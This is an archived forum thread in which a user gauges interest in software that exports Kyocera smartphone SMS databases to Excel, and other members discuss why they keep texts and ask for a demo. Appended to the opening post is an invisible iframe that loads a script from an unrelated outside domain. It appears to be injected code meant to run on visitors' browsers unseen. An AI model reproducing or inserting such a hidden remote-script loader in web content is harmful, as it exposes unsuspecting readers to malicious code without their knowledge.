+ Reply to Thread
Page 1 of 2 1 2 LastLast

SMS (Text Message)Management Software Is Here

Do you want to be able to sort through your saved SMSs for the vital piece of information? Do you like to keep a record of what you sent to whom and when?

Well when i got my 6035, i started saving important SMSs to the saved folder. The capacity is huge and now i have 000's. The problem was that i couldn't easily sort through them on the phone, so i posted a notice here if anyone knew of any tools to export the message file to Excel or similar. Unfortunately there were no answers.

So my brother-in-law has written an application that will import the pdb file enable you to sort through the message by various headings (date, to, from etc), import and apply an outlook address book and finally to export the message database into a format viewable by Excel.

It works a treat! The question for you all is do you think people would pay for this software? What would its value to you be? I think its awesome but i might be the only one.

If there is interest, he'll smooth of the edges and get it out there.

As soon as i get my hands on a 7135, any modifications for it to be compatible, will be made.

So, what do you all think?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I love SMS and use it a lot, but I usually just delete them afterward. And I'm the type that usually can't part with things.

So though I use SMS, I wouldn't have any need for the app. But best of luck.

Why do you hold onto them?
    ~'kito
    pdaPhoneHome Moderator

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    I could definitely use something like that!
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Why Keep Text Messages

1. An Important info that is received via SMS eg- repetitive support instructions you can text to colleagues from the pub; directions on finding that club; details on what your girlfriend said she was going to do to you next time she saw you etc

2. If you uses SMS a lot then its like a biography or diary running in the background. Something comes up (Police ask where you were on the afternoon of June 6, 2002) and chances are you'll find your answeer in your saved SMSs

3. There is now third reason but i needed to get KWC_MESSAGES.PDB into this thread so that like minded people can find this.

4. There is a 3rd reason - peace of mind

Another reason

5. If you are paranoid

6. "Throw away old bank statements, but save love letters."
    iPhone therefore iAm.

I consider my bank statements my love letters... is that bad?
    ~'kito
    pdaPhoneHome Moderator

lol

Nope-- as long as they are in the black.
    iPhone therefore iAm.

Back on the topic

7. Great remedy for short term memory loss issues

Seriously though...

Anyone else think this app would be worthwhile?

?

Yes, I would love to try/see this application. I use a message page on Verizon to let my users contact me afterhours for support, and the ablity to save/export these messages would be great(as in, proof to da boss that I was contacted, ect). So bring it on.
    Rob

Quando Omni Flunkus Moritati (when all else fails, play dead) motto of the Possum Lodge, Chapter 13.(The Red Green Show)

Thanks Rob - Any more?

Originally posted by Petermcd
    Thanks Rob - Any more?
    I'd be interested in checking it out to see what it's like. Don't know if I'd pay for though, until I got a chance to try it and see what it actually does.

~Ron

Trial Version

Thanks Ron - perhaps a demo version is in order then

SMS Export Tool

Any more comments?

Demo Version

Hi

Demo version should be ready over the weekend. Anyone interested in a copy, please email peter@primor.co.nz

Re: SMS Export Tool

Originally posted by Petermcd
    Any more comments?
    So what is the program cost going to be?

SMS Export Tool - Cost

The cost is unconfirmed yet - depends on what people are prepared to pay i guess. Not trying to get rich here - just recover some costs - mainly time. If anyone is interested in a demo version, email peter@primor.co.nz

I think a SMS management application would be awsome. However, something completely Palm based. Perhaps a prc that would parse the SMS DB (like minute counter does the call_history.pdb) and allow real time searching, manipulation, sorting, etc. The searching piece would be huge IMHO.

From there, if the user wanted the items exportable, it could be done from that app????

Just my 2 cents.